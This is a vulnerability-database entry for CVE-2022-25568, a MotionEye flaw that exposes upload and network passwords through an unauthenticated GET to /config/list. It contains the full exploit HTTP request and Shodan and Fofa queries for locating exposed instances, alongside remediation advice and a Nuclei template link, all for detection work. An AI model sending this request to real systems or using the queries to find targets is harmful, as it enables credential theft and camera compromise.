🔙 목록으로 돌아가기

CVE-2022-25568: MotionEye Config Info Disclosure

TitleMotionEye Config Info Disclosure
AuthorDhiyaneshDK
SeverityHigh
ImpactUnauthenticated attackers can access sensitive MotionEye configuration data including upload passwords and network passwords through the /config/list endpoint when regular user authentication is not configured, potentially compromising camera systems and network access.
RemediationUpdate MotionEye to version 0.42.2 or later and ensure regular user passwords are properly configured to restrict access.
CVSS Score7.5
EPSS Score0.89768
CVE IDCVE-2022-25568
CWE IDCWE-1188
Shodan Queryhtml:"MotionEye"http.html:"motioneye"
Fofa Querybody="motioneye"
Tags cve cve2022 motioneye config motioneye_project vuln

🔍 Vulnerability Description

MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.

🌐 HTTP Request

GET /config/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25568.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25568.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A